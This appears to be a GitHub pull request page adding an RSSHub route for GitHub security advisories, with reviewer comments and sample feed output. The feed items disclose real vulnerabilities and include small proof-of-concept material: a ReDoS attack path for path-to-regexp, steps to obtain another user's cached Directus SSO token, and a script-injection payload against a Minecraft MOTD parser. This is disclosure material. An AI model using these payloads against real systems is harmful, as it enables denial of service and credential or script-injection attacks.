<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-21529">https://nvd.nist.gov/vuln/detail/CVE-2024-21529</a></li>
<li><a href="https://github.com/lukeed/dset/commit/16d6154e085bef01e99f01330e5a421a7f098afa">https://github.com/lukeed/dset/commit/16d6154e085bef01e99f01330e5a421a7f098afa</a></li>
<li><a href="https://security.snyk.io/vuln/SNYK-JS-DSET-7116691">https://security.snyk.io/vuln/SNYK-JS-DSET-7116691</a></li>
<li><a href="https://github.com/advisories/GHSA-f6v4-cf5j-vf3w">https://github.com/advisories/GHSA-f6v4-cf5j-vf3w</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-f6v4-cf5j-vf3w</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-f6v4-cf5j-vf3w</guid>
<author>GitHub</author>
</item>
<item>
<title>[lunary] lunary-ai/lunary Access Control Vulnerability in Prompt Variation Management</title>
<description><p>In lunary-ai/lunary version 1.2.13, an insufficient granularity of access control vulnerability allows users to create, update, get, and delete prompt variations for datasets not owned by their organization. This issue arises due to the application not properly validating the ownership of dataset prompts and their variations against the organization or project of the requesting user. As a result, unauthorized modifications to dataset prompts can occur, leading to altered or removed dataset prompts without proper authorization. This vulnerability impacts the integrity and consistency of dataset information, potentially affecting the results of experiments.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-5389">https://nvd.nist.gov/vuln/detail/CVE-2024-5389</a></li>
<li><a href="https://huntr.com/bounties/3ca5309f-5615-4d5b-8043-968af220d7a2">https://huntr.com/bounties/3ca5309f-5615-4d5b-8043-968af220d7a2</a></li>
<li><a href="https://github.com/lunary-ai/lunary/commit/35dd4af0001a54ccb14276a1546eb977f82c0c5e">https://github.com/lunary-ai/lunary/commit/35dd4af0001a54ccb14276a1546eb977f82c0c5e</a></li>
<li><a href="https://github.com/advisories/GHSA-3mwc-2cj7-gx8c">https://github.com/advisories/GHSA-3mwc-2cj7-gx8c</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-3mwc-2cj7-gx8c</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-3mwc-2cj7-gx8c</guid>
<author>GitHub</author>
</item>
<item>
<title>[path-to-regexp] path-to-regexp outputs backtracking regular expressions</title>
<description><h3 id="impact">Impact</h3>
<p>A bad regular expression is generated any time you have two parameters within a single segment, separated by something that is not a period (<code>.</code>). For example, <code>/:a-:b</code>.</p>
<h3 id="patches">Patches</h3>
<p>For users of 0.1, upgrade to <code>0.1.10</code>. All other users should upgrade to <code>8.0.0</code>.</p>
<p>These versions add backtrack protection when a custom regex pattern is not provided:</p>
<ul>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v0.1.10">0.1.10</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v1.9.0">1.9.0</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v3.3.0">3.3.0</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v6.3.0">6.3.0</a></li>
</ul>
<p>They do not protect against vulnerable user supplied capture groups. Protecting against explicit user patterns is out of scope for old versions and not considered a vulnerability.</p>
<p>Version <a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v7.1.0">7.1.0</a> can enable <code>strict: true</code> and get an error when the regular expression might be bad.</p>
<p>Version <a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v8.0.0">8.0.0</a> removes the features that can cause a ReDoS.</p>
<h3 id="workarounds">Workarounds</h3>
<p>All versions can be patched by providing a custom regular expression for parameters after the first in a single segment. As long as the custom regular expression does not match the text before the parameter, you will be safe. For example, change <code>/:a-:b</code> to <code>/:a-:b([^-/]+)</code>.</p>
<p>If paths cannot be rewritten and versions cannot be upgraded, another alternative is to limit the URL length. For example, halving the attack string improves performance by 4x faster.</p>
<h3 id="details">Details</h3>
<p>Using <code>/:a-:b</code> will produce the regular expression <code>/^\/([^\/]+?)-([^\/]+?)\/?$/</code>. This can be exploited by a path such as <code>/a${'-a'.repeat(8_000)}/a</code>. <a href="https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS">OWASP</a> has a good example of why this occurs, but the TL;DR is the <code>/a</code> at the end ensures this route would never match but due to naive backtracking it will still attempt every combination of the <code>:a-:b</code> on the repeated 8,000 <code>-a</code>.</p>
<p>Because JavaScript is single threaded and regex matching runs on the main thread, poor performance will block the event loop and can lead to a DoS. In local benchmarks, exploiting the unsafe regex will result in performance that is over 1000x worse than the safe regex. In a more realistic environment using Express v4 and 10 concurrent connections, this translated to average latency of ~600ms vs 1ms.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS">OWASP</a></li>
<li><a href="https://blakeembrey.com/posts/2024-09-web-redos/">Detailed blog post</a></li>
</ul>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j">https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f">https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6">https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45296">https://nvd.nist.gov/vuln/detail/CVE-2024-45296</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/925ac8e3c5780b02f58cbd4e52f95da8ad2ac485">https://github.com/pillarjs/path-to-regexp/commit/925ac8e3c5780b02f58cbd4e52f95da8ad2ac485</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/d31670ae8f6e69cbfd56e835742195b7d10942ef">https://github.com/pillarjs/path-to-regexp/commit/d31670ae8f6e69cbfd56e835742195b7d10942ef</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/f1253b47b347dcb909e3e80b0eb2649109e59894">https://github.com/pillarjs/path-to-regexp/commit/f1253b47b347dcb909e3e80b0eb2649109e59894</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v6.3.0">https://github.com/pillarjs/path-to-regexp/releases/tag/v6.3.0</a></li>
<li><a href="https://github.com/advisories/GHSA-9wv6-86v2-598j">https://github.com/advisories/GHSA-9wv6-86v2-598j</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-9wv6-86v2-598j</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-9wv6-86v2-598j</guid>
<author>GitHub</author>
</item>
<item>
<title>[path-to-regexp] path-to-regexp outputs backtracking regular expressions</title>
<description><h3 id="impact">Impact</h3>
<p>A bad regular expression is generated any time you have two parameters within a single segment, separated by something that is not a period (<code>.</code>). For example, <code>/:a-:b</code>.</p>
<h3 id="patches">Patches</h3>
<p>For users of 0.1, upgrade to <code>0.1.10</code>. All other users should upgrade to <code>8.0.0</code>.</p>
<p>These versions add backtrack protection when a custom regex pattern is not provided:</p>
<ul>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v0.1.10">0.1.10</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v1.9.0">1.9.0</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v3.3.0">3.3.0</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v6.3.0">6.3.0</a></li>
</ul>
<p>They do not protect against vulnerable user supplied capture groups. Protecting against explicit user patterns is out of scope for old versions and not considered a vulnerability.</p>
<p>Version <a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v7.1.0">7.1.0</a> can enable <code>strict: true</code> and get an error when the regular expression might be bad.</p>
<p>Version <a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v8.0.0">8.0.0</a> removes the features that can cause a ReDoS.</p>
<h3 id="workarounds">Workarounds</h3>
<p>All versions can be patched by providing a custom regular expression for parameters after the first in a single segment. As long as the custom regular expression does not match the text before the parameter, you will be safe. For example, change <code>/:a-:b</code> to <code>/:a-:b([^-/]+)</code>.</p>
<p>If paths cannot be rewritten and versions cannot be upgraded, another alternative is to limit the URL length. For example, halving the attack string improves performance by 4x faster.</p>
<h3 id="details">Details</h3>
<p>Using <code>/:a-:b</code> will produce the regular expression <code>/^\/([^\/]+?)-([^\/]+?)\/?$/</code>. This can be exploited by a path such as <code>/a${'-a'.repeat(8_000)}/a</code>. <a href="https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS">OWASP</a> has a good example of why this occurs, but the TL;DR is the <code>/a</code> at the end ensures this route would never match but due to naive backtracking it will still attempt every combination of the <code>:a-:b</code> on the repeated 8,000 <code>-a</code>.</p>
<p>Because JavaScript is single threaded and regex matching runs on the main thread, poor performance will block the event loop and can lead to a DoS. In local benchmarks, exploiting the unsafe regex will result in performance that is over 1000x worse than the safe regex. In a more realistic environment using Express v4 and 10 concurrent connections, this translated to average latency of ~600ms vs 1ms.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS">OWASP</a></li>
<li><a href="https://blakeembrey.com/posts/2024-09-web-redos/">Detailed blog post</a></li>
</ul>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j">https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f">https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6">https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45296">https://nvd.nist.gov/vuln/detail/CVE-2024-45296</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/925ac8e3c5780b02f58cbd4e52f95da8ad2ac485">https://github.com/pillarjs/path-to-regexp/commit/925ac8e3c5780b02f58cbd4e52f95da8ad2ac485</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/d31670ae8f6e69cbfd56e835742195b7d10942ef">https://github.com/pillarjs/path-to-regexp/commit/d31670ae8f6e69cbfd56e835742195b7d10942ef</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/f1253b47b347dcb909e3e80b0eb2649109e59894">https://github.com/pillarjs/path-to-regexp/commit/f1253b47b347dcb909e3e80b0eb2649109e59894</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v6.3.0">https://github.com/pillarjs/path-to-regexp/releases/tag/v6.3.0</a></li>
<li><a href="https://github.com/advisories/GHSA-9wv6-86v2-598j">https://github.com/advisories/GHSA-9wv6-86v2-598j</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-9wv6-86v2-598j</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-9wv6-86v2-598j</guid>
<author>GitHub</author>
</item>
<item>
<title>[@directus/api] Session is cached for OpenID and OAuth2 if `redirect` is not used</title>
<description><h3 id="summary">Summary</h3>
<p>Unauthenticated user can access credentials of last authenticated user via OpenID or OAuth2 where the authentication URL did not include <code>redirect</code> query string.</p>
<p>For example:</p>
<ul>
<li>Project is configured with OpenID or OAuth2</li>
<li>Project is configured with cache enabled</li>
<li>User tries to login via SSO link, but without <code>redirect</code> query string</li>
<li>After successful login, credentials are cached</li>
<li>If an unauthenticated user tries to login via SSO link, it will return the credentials of the other last user</li>
</ul>
<p>The SSO link is something like <code>https://directus.example.com/auth/login/openid/callback</code>, where <code>openid</code> is the name of the OpenID provider configured in Directus</p>
<h3 id="details">Details</h3>
<p>This happens because on that endpoint for both OpenId and Oauth2 Directus is using the <code>respond</code> middleware, which by default will try to cache GET requests that met some conditions. Although, those conditions do not include this scenario, when an unauthenticated request returns user credentials.
For OpenID, this can be seen here:
<a href="https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459">https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459</a>
And for OAuth2 can be seen here
<a href="https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428">https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428</a></p>
<h3 id="poc">PoC</h3>
<ul>
<li>Create a new Directus project</li>
<li>Set <code>CACHE_ENABLED</code> to true</li>
<li>Set <code>CACHE_STORE</code> to <code>redis</code> for reliable results (if using memory with multiple nodes, it may only happen sometimes, due to cache being different for different nodes)</li>
<li>Configure <code>REDIS</code> with redis string or redis host, port, user, etc.</li>
<li>Set <code>AUTH_PROVIDERS</code> to <code>openid</code></li>
<li>Set <code>PUBLIC_URL</code> to the the main URL of your project . For example, <code>PUBLIC_URL: http://localhost:8055</code></li>
<li>Configure <code>AUTH_OPENID_CLIENT_ID</code>, <code>AUTH_OPENID_CLIENT_SECRET</code>, <code>AUTH_OPENID_ISSUER_URL</code> with proper OpenID configurations</li>
<li>Be sure that on OpenID external app you have configured Redirect URI to <code>http://localhost:8055/auth/login/openid/callback</code></li>
<li>Run Directus</li>
<li>Open the SSO link like <code>http://localhost:8055/auth/login/openid/callback</code></li>
<li>Do the authentication on the OpenID external webpage</li>
<li>Verify that it you got redirected to a page with a JSON including <code>access_token</code> property</li>
<li>Be sure all anonymous mode windows are closed</li>
<li>Open an anonymous window and go to the SSO Link <code>http://localhost:8055/auth/login/openid/callback</code> and see you have the same credentials, even though you don't have any session because you are in anonymous mode</li>
</ul>
<h3 id="impact">Impact</h3>
<p>All projects using OpenID or OAuth 2, that does not include <code>redirect</code> query string on loggin in users.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/directus/directus/security/advisories/GHSA-cff8-x7jv-4fm8">https://github.com/directus/directus/security/advisories/GHSA-cff8-x7jv-4fm8</a></li>
<li><a href="https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b">https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b</a></li>
<li><a href="https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52">https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52</a></li>
<li><a href="https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428">https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428</a></li>
<li><a href="https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459">https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45596">https://nvd.nist.gov/vuln/detail/CVE-2024-45596</a></li>
<li><a href="https://github.com/advisories/GHSA-cff8-x7jv-4fm8">https://github.com/advisories/GHSA-cff8-x7jv-4fm8</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-cff8-x7jv-4fm8</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-cff8-x7jv-4fm8</guid>
<author>GitHub</author>
</item>
<item>
<title>[@directus/api] Session is cached for OpenID and OAuth2 if `redirect` is not used</title>
<description><h3 id="summary">Summary</h3>
<p>Unauthenticated user can access credentials of last authenticated user via OpenID or OAuth2 where the authentication URL did not include <code>redirect</code> query string.</p>
<p>For example:</p>
<ul>
<li>Project is configured with OpenID or OAuth2</li>
<li>Project is configured with cache enabled</li>
<li>User tries to login via SSO link, but without <code>redirect</code> query string</li>
<li>After successful login, credentials are cached</li>
<li>If an unauthenticated user tries to login via SSO link, it will return the credentials of the other last user</li>
</ul>
<p>The SSO link is something like <code>https://directus.example.com/auth/login/openid/callback</code>, where <code>openid</code> is the name of the OpenID provider configured in Directus</p>
<h3 id="details">Details</h3>
<p>This happens because on that endpoint for both OpenId and Oauth2 Directus is using the <code>respond</code> middleware, which by default will try to cache GET requests that met some conditions. Although, those conditions do not include this scenario, when an unauthenticated request returns user credentials.
For OpenID, this can be seen here:
<a href="https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459">https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459</a>
And for OAuth2 can be seen here
<a href="https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428">https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428</a></p>
<h3 id="poc">PoC</h3>
<ul>
<li>Create a new Directus project</li>
<li>Set <code>CACHE_ENABLED</code> to true</li>
<li>Set <code>CACHE_STORE</code> to <code>redis</code> for reliable results (if using memory with multiple nodes, it may only happen sometimes, due to cache being different for different nodes)</li>
<li>Configure <code>REDIS</code> with redis string or redis host, port, user, etc.</li>
<li>Set <code>AUTH_PROVIDERS</code> to <code>openid</code></li>
<li>Set <code>PUBLIC_URL</code> to the the main URL of your project . For example, <code>PUBLIC_URL: http://localhost:8055</code></li>
<li>Configure <code>AUTH_OPENID_CLIENT_ID</code>, <code>AUTH_OPENID_CLIENT_SECRET</code>, <code>AUTH_OPENID_ISSUER_URL</code> with proper OpenID configurations</li>
<li>Be sure that on OpenID external app you have configured Redirect URI to <code>http://localhost:8055/auth/login/openid/callback</code></li>
<li>Run Directus</li>
<li>Open the SSO link like <code>http://localhost:8055/auth/login/openid/callback</code></li>
<li>Do the authentication on the OpenID external webpage</li>
<li>Verify that it you got redirected to a page with a JSON including <code>access_token</code> property</li>
<li>Be sure all anonymous mode windows are closed</li>
<li>Open an anonymous window and go to the SSO Link <code>http://localhost:8055/auth/login/openid/callback</code> and see you have the same credentials, even though you don't have any session because you are in anonymous mode</li>
</ul>
<h3 id="impact">Impact</h3>
<p>All projects using OpenID or OAuth 2, that does not include <code>redirect</code> query string on loggin in users.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/directus/directus/security/advisories/GHSA-cff8-x7jv-4fm8">https://github.com/directus/directus/security/advisories/GHSA-cff8-x7jv-4fm8</a></li>
<li><a href="https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b">https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b</a></li>
<li><a href="https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52">https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52</a></li>
<li><a href="https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428">https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428</a></li>
<li><a href="https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459">https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45596">https://nvd.nist.gov/vuln/detail/CVE-2024-45596</a></li>
<li><a href="https://github.com/advisories/GHSA-cff8-x7jv-4fm8">https://github.com/advisories/GHSA-cff8-x7jv-4fm8</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-cff8-x7jv-4fm8</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-cff8-x7jv-4fm8</guid>
<author>GitHub</author>
</item>
<item>
<title>[directus] Session is cached for OpenID and OAuth2 if `redirect` is not used</title>
<description><h3 id="summary">Summary</h3>
<p>Unauthenticated user can access credentials of last authenticated user via OpenID or OAuth2 where the authentication URL did not include <code>redirect</code> query string.</p>
<p>For example:</p>
<ul>
<li>Project is configured with OpenID or OAuth2</li>
<li>Project is configured with cache enabled</li>
<li>User tries to login via SSO link, but without <code>redirect</code> query string</li>
<li>After successful login, credentials are cached</li>
<li>If an unauthenticated user tries to login via SSO link, it will return the credentials of the other last user</li>
</ul>
<p>The SSO link is something like <code>https://directus.example.com/auth/login/openid/callback</code>, where <code>openid</code> is the name of the OpenID provider configured in Directus</p>
<h3 id="details">Details</h3>
<p>This happens because on that endpoint for both OpenId and Oauth2 Directus is using the <code>respond</code> middleware, which by default will try to cache GET requests that met some conditions. Although, those conditions do not include this scenario, when an unauthenticated request returns user credentials.
For OpenID, this can be seen here:
<a href="https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459">https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459</a>
And for OAuth2 can be seen here
<a href="https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428">https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428</a></p>
<h3 id="poc">PoC</h3>
<ul>
<li>Create a new Directus project</li>
<li>Set <code>CACHE_ENABLED</code> to true</li>
<li>Set <code>CACHE_STORE</code> to <code>redis</code> for reliable results (if using memory with multiple nodes, it may only happen sometimes, due to cache being different for different nodes)</li>
<li>Configure <code>REDIS</code> with redis string or redis host, port, user, etc.</li>
<li>Set <code>AUTH_PROVIDERS</code> to <code>openid</code></li>
<li>Set <code>PUBLIC_URL</code> to the the main URL of your project . For example, <code>PUBLIC_URL: http://localhost:8055</code></li>
<li>Configure <code>AUTH_OPENID_CLIENT_ID</code>, <code>AUTH_OPENID_CLIENT_SECRET</code>, <code>AUTH_OPENID_ISSUER_URL</code> with proper OpenID configurations</li>
<li>Be sure that on OpenID external app you have configured Redirect URI to <code>http://localhost:8055/auth/login/openid/callback</code></li>
<li>Run Directus</li>
<li>Open the SSO link like <code>http://localhost:8055/auth/login/openid/callback</code></li>
<li>Do the authentication on the OpenID external webpage</li>
<li>Verify that it you got redirected to a page with a JSON including <code>access_token</code> property</li>
<li>Be sure all anonymous mode windows are closed</li>
<li>Open an anonymous window and go to the SSO Link <code>http://localhost:8055/auth/login/openid/callback</code> and see you have the same credentials, even though you don't have any session because you are in anonymous mode</li>
</ul>
<h3 id="impact">Impact</h3>
<p>All projects using OpenID or OAuth 2, that does not include <code>redirect</code> query string on loggin in users.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/directus/directus/security/advisories/GHSA-cff8-x7jv-4fm8">https://github.com/directus/directus/security/advisories/GHSA-cff8-x7jv-4fm8</a></li>
<li><a href="https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b">https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b</a></li>
<li><a href="https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52">https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52</a></li>
<li><a href="https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428">https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428</a></li>
<li><a href="https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459">https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45596">https://nvd.nist.gov/vuln/detail/CVE-2024-45596</a></li>
<li><a href="https://github.com/advisories/GHSA-cff8... |
|
|
感觉不是我这边的问题吧,但是加了三个问号之后满足了null check过检查了 |
TonyRL
reviewed
Sep 14, 2024
| @@ -0,0 +1,72 @@ | |||
| import type { Namespace } from '@/types'; | |||
There was a problem hiding this comment.
https://docs.rsshub.app/joinus/new-rss/start-code#creating-namespace
Do not create variations for the same namespace. Please use github instead.
There was a problem hiding this comment.
Thank you for the feedback! I've consolidated the namespace under github as suggested and removed the variations. Please review the updated implementation and let me know if further adjustments are needed.
This comment was marked as duplicate.
This comment was marked as duplicate.
sd0ric4
changed the title
TonyRL
reviewed
Sep 14, 2024
lib/routes/github/advisor.ts
Outdated
| import { parseDate } from '@/utils/parse-date'; | ||
| export const route: Route = { | ||
| path: '/advisor/data/:category?', | ||
| categories: ['game'], |
There was a problem hiding this comment.
This does not belong to game at all.
lib/routes/github/advisor.ts
Outdated
Comment on lines
43
to
58
| const apiRootUrl = 'https://azu.github.io/github-advisory-database-rss'; | ||
| const apiUrl = `${apiRootUrl}/${category}.json`; | ||
| const currentUrl = `https://github.com/advisories`; | ||
|
|
||
| const response = await got({ | ||
| method: 'get', | ||
| url: apiUrl, | ||
| }); | ||
|
|
||
| const items = response.data.items.map((item) => ({ | ||
| author: item.author.name, | ||
| title: item.title, | ||
| link: item.url, | ||
| description: item.content_html, | ||
| pubDate: parseDate(item.date_publishede), | ||
| })); |
There was a problem hiding this comment.
Please use first party data at https://github.com/advisories when it's available instead of relying on third parties'.
There was a problem hiding this comment.
I have updated the code to use first-party data from https://github.com/advisories when available, instead of relying on third parties.
This comment was marked as outdated.
This comment was marked as outdated.
…n third-party API
This comment was marked as duplicate.
This comment was marked as duplicate.
|
Successfully generated as following: http://localhost:1200/github/advisor/data/reviewed/composer - Success ✔️<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" version="2.0">
<channel>
<title>GitHub Advisory Database RSS - composer - reviewed</title>
<link>https://github.com/advisories</link>
<atom:link href="http://localhost:1200/github/advisor/data/reviewed/composer" rel="self" type="application/rss+xml"></atom:link>
<description>GitHub Advisory Database RSS - composer - reviewed - Powered by RSSHub</description>
<generator>RSSHub</generator>
<webMaster>contact@rsshub.app (RSSHub)</webMaster>
<language>en</language>
<lastBuildDate>Sat, 05 Oct 2024 18:30:58 GMT</lastBuildDate>
<ttl>5</ttl>
<item>
<title>Minecraft MOTD Parser's HtmlGenerator vulnerable to XSS</title>
<description><h3>Summary</h3>
<p>The <code class="notranslate">HtmlGenerator</code> class is subject to potential cross-site scripting (XSS) attack through a parsed malformed Minecraft server MOTD.</p>
<h3>Context</h3>
<p>Minecraft server owners can set a so-called MOTD (Message of the Day) for their server that appears next to the server icon and below the server name on the multiplayer server list of a player's Minecraft client. The Minecraft server sends the MOTD in the <code class="notranslate">description</code> property of the <a href="https://wiki.vg/Server_List_Ping#Status_Response" rel="nofollow">Status Response</a> packet. The <a href="https://github.com/jgniecki/MinecraftMotdParser">jgniecki/MinecraftMotdParser</a> PHP library is able to parse the value of the <code class="notranslate">description</code> property, which can be either a string or an array of text components. By utilizing the aforementioned <code class="notranslate">HtmlGenerator</code> class, it is also able to transform the value into an HTML string that can be used to visualize the MOTD on a web page.</p>
<h3>Details</h3>
<p>The <code class="notranslate">HtmlGenerator</code> iterates through objects of <code class="notranslate">MotdItem</code> that are contained in an object of <code class="notranslate">MotdItemCollection</code> to generate a HTML string. An attacker can make malicious inputs to the <code class="notranslate">color</code> and <code class="notranslate">text</code> properties of <code class="notranslate">MotdItem</code> to inject own HTML into a web page during web page generation. For example by sending a malicious MOTD from a Minecraft server under their control that was queried and passed to the <code class="notranslate">HtmlGenerator</code>.</p>
<p>This XSS vulnerability exists because the values of these properties are neither filtered nor escaped, as can be seen here:</p>
<ul>
<li><a href="https://github.com/jgniecki/MinecraftMotdParser/blob/0412f68eeb91729a00444a8d6c00c45623884aa5/src/Generator/HtmlGenerator.php#L49">https://github.com/jgniecki/MinecraftMotdParser/blob/0412f68eeb91729a00444a8d6c00c45623884aa5/src/Generator/HtmlGenerator.php#L49</a></li>
<li><a href="https://github.com/jgniecki/MinecraftMotdParser/blob/0412f68eeb91729a00444a8d6c00c45623884aa5/src/Generator/HtmlGenerator.php#L80">https://github.com/jgniecki/MinecraftMotdParser/blob/0412f68eeb91729a00444a8d6c00c45623884aa5/src/Generator/HtmlGenerator.php#L80</a></li>
</ul>
<h3>Proof of Concept</h3>
<p>JavaScript code can be injected into the <code class="notranslate">HtmlGenerator</code> by parsing either a string via <code class="notranslate">TextParser</code> or an array via <code class="notranslate">ArrayParser</code>. The following code examples demonstrate the vulnerability by triggering the alert dialog of the browser.</p>
<h4>XSS via <code class="notranslate">TextParser</code></h4>
<div class="highlight highlight-text-html-php"><pre class="notranslate"><span class="pl-ent">&lt;?php</span>
<span class="pl-k">use</span> <span class="pl-v">DevLancer</span>\<span class="pl-v">MinecraftMotdParser</span>\<span class="pl-v">Collection</span>\<span class="pl-v">MotdItemCollection</span>;
<span class="pl-k">use</span> <span class="pl-v">DevLancer</span>\<span class="pl-v">MinecraftMotdParser</span>\<span class="pl-v">Generator</span>\<span class="pl-v">HtmlGenerator</span>;
<span class="pl-k">use</span> <span class="pl-v">DevLancer</span>\<span class="pl-v">MinecraftMotdParser</span>\<span class="pl-v">Parser</span>\<span class="pl-v">TextParser</span>;
<span class="pl-s1"><span class="pl-c1">$</span>motdCollection</span> = (<span class="pl-k">new</span> <span class="pl-v">TextParser</span>())-&gt;<span class="pl-en">parse</span>(<span class="pl-s">'<span class="pl-s">&lt;script&gt;alert("XSS on page load")&lt;/script&gt;</span>'</span>, <span class="pl-k">new</span> <span class="pl-v">MotdItemCollection</span>());
<span class="pl-k">echo</span> (<span class="pl-k">new</span> <span class="pl-v">HtmlGenerator</span>())-&gt;<span class="pl-en">generate</span>(<span class="pl-s1"><span class="pl-c1">$</span>motdCollection</span>);</pre></div>
<h4>XSS via <code class="notranslate">ArrayParser</code></h4>
<div class="highlight highlight-text-html-php"><pre class="notranslate"><span class="pl-ent">&lt;?php</span>
<span class="pl-k">use</span> <span class="pl-v">DevLancer</span>\<span class="pl-v">MinecraftMotdParser</span>\<span class="pl-v">Collection</span>\<span class="pl-v">MotdItemCollection</span>;
